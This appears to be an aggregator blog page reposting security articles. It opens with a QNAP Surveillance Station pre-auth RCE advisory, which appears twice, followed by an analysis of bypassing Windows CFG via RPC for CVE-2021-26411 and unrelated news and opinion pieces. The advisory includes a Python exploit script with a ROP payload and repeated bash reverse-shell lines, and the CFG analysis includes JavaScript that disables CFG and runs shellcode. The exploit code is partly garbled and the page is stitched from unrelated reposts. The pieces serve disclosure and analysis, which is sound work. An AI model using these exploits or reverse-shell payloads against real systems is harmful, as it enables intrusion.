Malware Devil

Saturday, April 10, 2021

SSD Advisory – QNAP Pre-Auth CGI_Find_Parameter RCE


Find out how a a memory corruption vulnerability can lead to a pre-auth remote code execution on QNAP QTS’s Surveillance Station plugin.

Vulnerability Summary

QNAP NAS with “Surveillance Station Local Display function can perform monitoring and playback by using an HDMI display to deliver live Full HD (1920×1080) video monitoring”.

Insecure use of user supplied data sent to the QNAP NAS device can be exploited to run arbitrary code by overflowing an internal buffer used by the Surveillance Station plugin.




An independent security researchers has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

QNAP QTS Surveillance Station version

QNAP QTS Surveillance Station version

Vendor Response

“We fixed this vulnerability in the following versions:

Surveillance Station (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS)

Surveillance Station (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS)”

More details can be found here:

Vulnerability Analysis

Due to lack of proper bound checking, it’s possible to overflow a stack buffer with a specially crafted HTTP request.

user.cgi is used to manage login session to Surveillance Station. but vulnerability is caused by using strcpy while receiving sid through CGI_Find_Parameter function. Also, the vulnerable function call is located in the sub_ACB0 (from ida) here is part of binary user.cgi:

 v2 = CGI_Find_Parameter(a1, "initdata");
 v3 = CGI_Find_Parameter(v1, "user");
 if ( v3 ) {
    v4 =*(_DWORD *)(v3 +4);
    if ( !*(_BYTE *)v4 || !strcmp(*(constchar**)(v3 +4), "guest") ) 
        goto LABEL_34; 
    else { 
        v4 =0; 
    v5 = CGI_Find_Parameter(v1, "pwd");
    if ( v5 ) 
        v6 =*(char**)(v5 +4);
    else v6 =0;
    v7 = CGI_Find_Parameter(v1, "sid");
    v8 = v7;
    if ( v7 ) {
        v9 =*(constchar**)(v7 +4);
        strcpy(&dest, v9);

The CGI_Find Parameter function is used to process a request in QNAP QTS.


import requests
import threading
from struct import *
p = lambda x: pack("<L", x)
def run(session, data):
    res = ["", data) for i in range(5000)]
def main():
        with requests.Session() as s:
                payload = "A" * 3108
                payload += p(0x74a8eb8c) # pop {r0, r4, pc}
                payload += p(0x71154e28) # heap address
                payload += "BBBB"
                payload += p(0x74a636c4 + 1) # system
                data = {
                    "act" : "login",
                    "sid" : payload,
                    "slep" : "bash -i >& /dev/tcp/ 0>&1;" * 0x5000 + "x00" + "bash -i >& /dev/tcp/ 0>&1;" * 0x5000,
                for i in range(30):
                    t = threading.Thread(target=run, args=(s, data))
if __name__ == '__main__':

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Exploiting Windows RPC to bypass CFG mitigation

The general method of browser render process exploit is: after exploiting the vulnerability to obtain user mode arbitrary memory read/write primitive, the vtable of DOM/js object is tampered to hijack the code execution flow. Then VirtualProtect is called by ROP chain to modify the shellcode memory to PAGE_EXECUTE_READWRITE, and the code execution flow is jumped to shellcode by ROP chain finally. After Windows 8.1, Microsoft introduced CFG (Control Flow Guard)[1] mitigation to verify the indirect function call, which mitigates the exploitation of tampering with vtable to get code execution.

However, the confrontation is not end. Some new methods to bypass CFG mitigation have emerged. For example, in chakra/jscript9, the code execution flow is hijacked by tampering with the function return address on the stack; in v8, WebAssembly with executable memory property is used to execute shellcode. In December 2020, Microsoft introduced CET(Control-flow Enforcement Technology)[2] mitigation technology based on Intel Tiger Lake CPU in Windows 10 20H1, which protects the exploitation of tampering with the function return address on the stack. Therefore, how to bypass CFG in a CET mitigation environment has become a new problem for vulnerability exploitation.

When analyzing CVE-2021-26411 in-the-wild sample, we found a new method to bypass CFG mitigation using Windows RPC (Remote Procedure Call)[3]. This method does not rely on the ROP chain. By constructing RPC_MESSAGE, arbitrary code execution can be achieved by calling rpcrt4!NdrServerCall2 manually.

CVE-2021-26411 Retrospect

My blog of “CVE-2021-26411: Internet Explorer mshtml use-after-free”
has illustrated the root cause: removeAttributeNode() triggers the attribute object nodeValue’s valueOf callback. During the callback, clearAttributes() is called manually, which causes the BSTR saved in nodeValue to be released in advance. After the valueOf callback returns, the nodeValue object is not checked if existed, which results in UAF.

The bug fix for this vulnerability in Windows March patch is to add an index check before deleting the object in CAttrArray::Destroy function:

For such a UAF vulnerability with a controllable memory size, the idea of exploitation is: use two different types of pointers (BSTR and Dictionary.items) to point to the reuse memory, then the pointer leak and pointer dereference ability is achieved via type confusion:

Windows RPC is used to support the scenario of distributed client/server function calls. Based on Windows RPC, the client can invoke server functions the same as local function call. The basic architecture of Windows RPC is shown as follows:

The client/server program passes the calling parameters or return values to the lower-level Stub function. The Stub function is responsible for encapsulating the data into NDR (Network Data Representation) format. Communications through the runtime library is provided by rpcrt4.dll.

An idl example is given below:

interface HelloRPC
        int add(int x, int y);

When the client calls the add function, the server receives the processing request from rpcrt4.dll and calls rpcrt4!NdrServerCall2:

rpcrt4!NdrServerCall2 has only one parameter PRPC_MESSAGE, which contains important data such as the function index and parameters. The server RPC_MESSAGE structure and main sub data structure are shown as follows (32 bits):

As shown in the aforementioned picture, in RPC_MESSAGE structure, the two important variables of function call are Buffer and RpcInterfaceInformation. The Buffer stores the parameters of the function, and RpcInterfaceInformation points to the RPC_SERVER_INTERFACE structure. The RPC_SERVER_INTERFACE structure saves the server program interface information, in which DispatchTable(+0x2c) saves the interface function pointers of the runtime library and the stub function, and InterpreterInfo(+0x3c) points to the MIDL_SERVER_INFO structure. The MIDL_SERVER_INFO structure saves the server IDL interface information, and the DispatchTable(+0x4) saves the pointer array of the server routine functions.

Here is an example to introduce the structure of RPC_MESSAGE:

According to the idl given above, when the client calls add(0x111, 0x222), the server program breaks at rpcrt4!NdrServerCall2:

It can be seen that the dynamic debugging memory dump is consistent with the RPC_MESSAGE structure analysis, and the add function is stored in MIDL_SERVER_INFO.DispatchTable.

Next, we analyze how rpcrt4!NdrServerCall2 invokes the add function according to RPC_MESSAGE:

The rpcrt4!NdrServerCall2 calls rpcrt4!NdrStubCall2 internally. The rpcrt4!NdrStubCall2 calculates the function pointer address based on MIDL_SERVER_INFO.DispatchTable and RPC_MESSAGE.ProcNum, and passes the function pointer, function parameters and parameter length to rpcrt4!Invoke:

The rpcrt4!Invoke calls the server provided routine function finally:

Based on above analysis, after achieving the arbitrary memory read/write primitive, we can construct an fake RPC_MESSAGE, set the function pointer and function parameters want to invoke, and call rpcrt4!NdrServerCall2 manually to implement any function execution.

Two problems need to be solved next:
1)How to invoke rpcrt4!NdrServerCall2 in javascript
2)When observing the server routine function call in rpcrt4!Invoke:

We can see that this is an indirect function call, and there is a CFG check. Therefore, we need to consider how to bypass the CFG protection here after tampering with the MIDL_SERVER_INFO.DispatchTable function pointer.

Let’s solve the problem 1 firstly: How to invoke rpcrt4!NdrServerCall2 in javascript?
We can replace the DOM object vtable’s function pointer with rpcrt4!NdrServerCall2. Because rpcrt4!NdrServerCall2 is a legal pointer recorded in CFGBitmap, it can pass the CFG check. The sample replacs MSHTML!CAttribute::normalize with rpcrt4!NdrServerCall2, and calls “xyz.normalize()” in javascript to invoke rpcrt4!NdrServerCall2.

Then we solve the problem 2: How to bypass the CFG protection in rpcrt4!NdrServerCall2?
The method in the sample is:
1) Use fake RPC_MESSAGE and rpcrt4!NdrServerCall2 to invoke VirtualProtect, and modify the memory attribute of RPCRT4!__guard_check_icall_fptr to PAGE_EXECUTE_READWRITE
2) Replace the pointer ntdll!LdrpValidateUserCallTarget saved in rpcrt4!__guard_check_icall_fptr with ntdll!KiFastSystemCallRet to kill the CFG check in rpcrt4.dll
3) Restore RPCRT4!__guard_check_icall_fptr memory attribute

function killCfg(addr) {
  var cfgobj = new CFGObject(addr)
  if (!cfgobj.getCFGValue()) 
  var guard_check_icall_fptr_address = cfgobj.getCFGAddress()
  var KiFastSystemCallRet = getProcAddr(ntdll, 'KiFastSystemCallRet')
  var tmpBuffer = createArrayBuffer(4)
  call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer])
  write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32)
  call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer])

After solving the two problems, the fake RPC_MESSAGE can be used to invoke any function pointer including the buffer stores the shellcode, because CFG check in rpcrt4.dll has been killed.
At last, the sample writes the shellcode to the location of msi.dll + 0x5000, and invokes the shellcode through rpcrt4!NdrServerCall2 finally:

var shellcode = new Uint8Array([0xcc])
var msi = call2(LoadLibraryExA, [newStr('msi.dll'), 0, 1]) + 0x5000
var tmpBuffer = createArrayBuffer(4)
call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer])
writeData(msi, shellcode)
call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer])
call2(msi, [])

The exploitation screenshot:

Some thoughts

A new method to bypass CFG mitigation by exploiting Windows RPC exposed in CVE-2021-26411 in the wild sample. This exploitation technology does not need to construct ROP chain, and achieve arbitrary code execution directly by fake RPC_MESSAGE. This exploitation technology is simple and stable. It is reasonable to believe that it will become a new and effective exploitation technology to bypass CFG mitigation.



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Study Shows Working From Home Could Be Here To Stay

It goes without saying that the pandemic has changed a great many things about life, as well as the world we live and work in. One significant change on the work front has, of course, been the dramatic rise in the number of people working from home.

We’re reaching a point now where, although we haven’t quite turned a corner where the pandemic is concerned, we’re clearly fast approaching that point.

Many planners and strategic thinkers are looking ahead and wondering what the future of work will be. Will everyone simply pack up their gear and head back into the office, or will we see a permanent shift to working from home for some portion of the workforce?

The short answer is that it’s probably going to wind up being a bit of both. Recently, Verizon conducted an in-depth study in an attempt to gauge the longer-term effects of the pandemic and based on the survey data they collected, fully 7 in 10 Americans prefer working remotely or in some hybrid remote/in-office capacity.

Additionally, 69 percent of survey respondents said that they expect to work remotely at least 1-2 days per week a year from now, and 54 percent said they expect that remote work will be a regular feature of work life going forward. Employers, eager to keep their star performers happy, will no doubt take heed and respond accordingly.

In addition to the points above, the survey revealed a few additional points of interest including:

  • 31 percent of respondents said they spend 3 hours a week or more on mobile devices.
  • 32 percent of respondents have either upgraded or considered upgrading their Internet bandwidth.
  • 42 percent of adults anticipate that a year from now they will be shopping in person and online equally.
  • 47 percent of adults have subscribed to a new streaming service.
  • 67 percent of adults are spending at least 3 hours per week watching live TV with 59 percent watch content through a streaming service.

Intriguing findings. If you haven’t made any specific post pandemic plans either way, these statistics certainly bear thinking about.

Used with permission from Article Aggregator

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Prism: Private Verifiable Set Computation over Multi-Owner Outsourced Databases

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A look at LLVM – std::clamp considered harmful?

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Detecting Exposed Cobalt Strike DNS Redirectors

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Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel

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SSD Advisory – QNAP Pre-Auth CGI_Find_Parameter RCE

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The Physical Impact of Manufacturing Cyber Threats

Cyber Threats to Physical Systems are Increasing in Sophistication and Volume

The recent growth in cyber-attacks against operational technology (OT) systems is unprecedented.

According to IBM’s 2020 X-Force Threat Intelligence Index report, targeted attacks against Industrial Control Systems (ICS) and OT assets have “increased over 2,000 percent since 2018.”

“In fact, the number of events targeting OT assets in 2019 was greater than the activity volume observed in the past three years combined.” These attacks represent a clear and present danger to manufacturers and other critical infrastructure sectors.

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Homeland Isn’t an American Word

The British Government has announced their Home Office will have a Director General for Homeland Security. Some in the UK reacted by saying it sounds American. Nice try. I thought everyone knows that America most definitely gets most of its English terminology for security from… wait for it… England. I mean who has a Home … Continue reading Homeland Isn’t an American Word

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Hackers Tampered With APKPure Store to Distribute Malware Apps

APKPure, one of the largest alternative app stores outside of the Google Play Store, was infected with malware this week, allowing threat actors to distribute Trojans to Android devices.
In an incident that’s similar to that of German telecommunications equipment manufacturer Gigaset, the APKPure client version 3.17.18 is said to have been tampered with in an attempt to trick unsuspecting users
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Unofficial Android App Store APKPure Infected With Malware

The APKPure app store was infected with malware that can download Trojans to other Android devices, researchers report.

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CISA Launches New Threat Detection Dashboard

Aviary is a new dashboard that works with CISA’s Sparrow threat detection tool.

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Battle for the Endpoint

How to build a new cyber strategy for 2021 and beyond.

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SSD Advisory – QNAP Pre-Auth CGI_Find_Parameter RCE


Find out how a a memory corruption vulnerability can lead to a pre-auth remote code execution on QNAP QTS’s Surveillance Station plugin.

Vulnerability Summary

QNAP NAS with “Surveillance Station Local Display function can perform monitoring and playback by using an HDMI display to deliver live Full HD (1920×1080) video monitoring”.

Insecure use of user supplied data sent to the QNAP NAS device can be exploited to run arbitrary code by overflowing an internal buffer used by the Surveillance Station plugin.




An independent security researchers has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

QNAP QTS Surveillance Station version

QNAP QTS Surveillance Station version

Vendor Response

“We fixed this vulnerability in the following versions:

Surveillance Station (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS)

Surveillance Station (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS)”

More details can be found here:

Vulnerability Analysis

Due to lack of proper bound checking, it’s possible to overflow a stack buffer with a specially crafted HTTP request.

user.cgi is used to manage login session to Surveillance Station. but vulnerability is caused by using strcpy while receiving sid through CGI_Find_Parameter function. Also, the vulnerable function call is located in the sub_ACB0 (from ida) here is part of binary user.cgi:

 v2 = CGI_Find_Parameter(a1, "initdata");
 v3 = CGI_Find_Parameter(v1, "user");
 if ( v3 ) {
    v4 =*(_DWORD *)(v3 +4);
    if ( !*(_BYTE *)v4 || !strcmp(*(constchar**)(v3 +4), "guest") ) 
        goto LABEL_34; 
    else { 
        v4 =0; 
    v5 = CGI_Find_Parameter(v1, "pwd");
    if ( v5 ) 
        v6 =*(char**)(v5 +4);
    else v6 =0;
    v7 = CGI_Find_Parameter(v1, "sid");
    v8 = v7;
    if ( v7 ) {
        v9 =*(constchar**)(v7 +4);
        strcpy(&dest, v9);

The CGI_Find Parameter function is used to process a request in QNAP QTS.


import requests
import threading
from struct import *
p = lambda x: pack("<L", x)
def run(session, data):
    res = ["", data) for i in range(5000)]
def main():
        with requests.Session() as s:
                payload = "A" * 3108
                payload += p(0x74a8eb8c) # pop {r0, r4, pc}
                payload += p(0x71154e28) # heap address
                payload += "BBBB"
                payload += p(0x74a636c4 + 1) # system
                data = {
                    "act" : "login",
                    "sid" : payload,
                    "slep" : "bash -i >& /dev/tcp/ 0>&1;" * 0x5000 + "x00" + "bash -i >& /dev/tcp/ 0>&1;" * 0x5000,
                for i in range(30):
                    t = threading.Thread(target=run, args=(s, data))
if __name__ == '__main__':

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Friday, April 9, 2021

2021-04-09 – IcedID (Bokbot) infection from zipped JS file

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5 consejos para evitar los ciberataques en plataformas de EdTech

¿Cómo evitar ataques a organizaciones EdTech??

A medida que continúa la pandemia de COVID-19, muchas instituciones educativas se han visto obligadas a cambiar sus clases presenciales a clases virtuales. Varias plataformas de EdTech también han lanzado clases gratuitas que han incitado a los estudiantes a probar …

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Don’t Put Off Cybersecurity Incident Response Planning

There’s no time to waste in a cybersecurity disaster. How do you plan to respond to an incident, and what do you do next? Find out now!

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Today, You Really Want a SaaS SIEM!

One thing I did not expect to see in 2021 is a lot of people complaining about how difficult their SIEM is to operate.

Let’s explore this topic for the (n+1)-th time. And let me tell you … that “n” is pretty damn large since my first involvement with SIEM in January 2002 (!) — examples, examples, examples.

Anton’s old SIEM presentation from 2012

(source, date: 2012)

Before we go, we need to separate the SIEM tool operation difficulties from the SIEM mission difficulties. To remind, the mission that the SIEM is aimed at is very difficult in today’s environments. The mission also evolved a lot over the years from alert aggregation to compliance and reporting to threat detection and response support. Note that even intelligently aggregating, cleaning and normalizing lots of logs coming from a broad range of systems, from mainframes to microservices is not that easy…

With that out of the way, SIEM detection challenges definitely do not mean that you need to spend hours patching a SIEM appliance, for example. Or tuning the backend to make sure that the searches are fast (fast being a relative term, longer than a coffee break, but shorter than a vacation for many tools).

Over the years — and recent years — mind you, I’ve heard people say things like (quotes are all fictitious, but all inspired by real examples; if you literally said the below, this is a coincidence):

  • “We dread the day when our vendor releases a software update”
  • “We have a small team and we have just enough people to keep the SIEM running but we have no time left to use it”
  • “We spend 60% of our time keeping the tool running and the rest tuning and using it”
  • “We only have enough people to keep the SIEM running, but not to confider the collectors properly”

Now, aren’t we all surprised that this is still an issue today in 2021? I recall the day when appliance “SEM” products have started replacing the old-style installable software SIM. The vendors were touting the fact that anybody with a screwdriver can install their SIEM right into a rack — and then magic happens.

But what happened instead was reality.

Anton’s old SIEM presentation from 2009

(source, date: 2009)

So, yes, even today’s SIEM tools produce the customer reactions I mentioned above. And open source — in this context — is occasionally worse, requiring even more work to keep it up and running, performing, and scaling.

OK, now guess which ONE THING solves most of the SIEM operation challenges?

You got it: SaaS SIEM. A proper cloud-native SaaS SIEM, not the fake cloud variety (this does solve some of the challenges and creates others).

As my former team wrote in their update to my original SaaS SIEM paper, “A cloud-based solution, with its inherent elasticity and capacity, can help clients implement CLM [Centralized Log Management] as part of SIEM, without the scalability, performance and architecture concerns that usually come with this task. A cloud-based solution can also store logs for longer periods of time and at lower prices, while keeping them accessible for reports or investigations as needed.” They also reminded us that a SaaS SIEM is still a SIEM that you need to use.

Now, how to decide if SaaS SIEM is for you? Here are some arguments:

Likely YES:

  • You are “cloud first” or as Gartner says now “cloud smart” (because “cloud-first is so 2013”)
  • You want your SIEM to always perform, even if you never “performance tuned it” (like Chronicle 0.25 seconds per any search)
  • You want to have easier threat detection in cloud environments
  • You want all the data to be available, possibly for years at low cost
  • You are willing to tolerate a less mature and possibly less feature-rich product (fact: it is hard to write as much code in 2 years as somebody else wrote in 20)

Possibly NO:

  • You have intense cloud fears, rational or irrational (here it does not really matter if the fears are rational; what matters if that your organizations acts on those fears)
  • You require absolutely every bell and whistle that only a 20 year vendor can deliver.

This is how I’d decide. For more details, go here (or here). Now, go and get “cloud smart” 🙂

Today, You Really Want a SaaS SIEM! was originally published in Anton on Security on Medium, where people are continuing the conversation by highlighting and responding to this story.

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Battle for the Endpoint

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

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Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...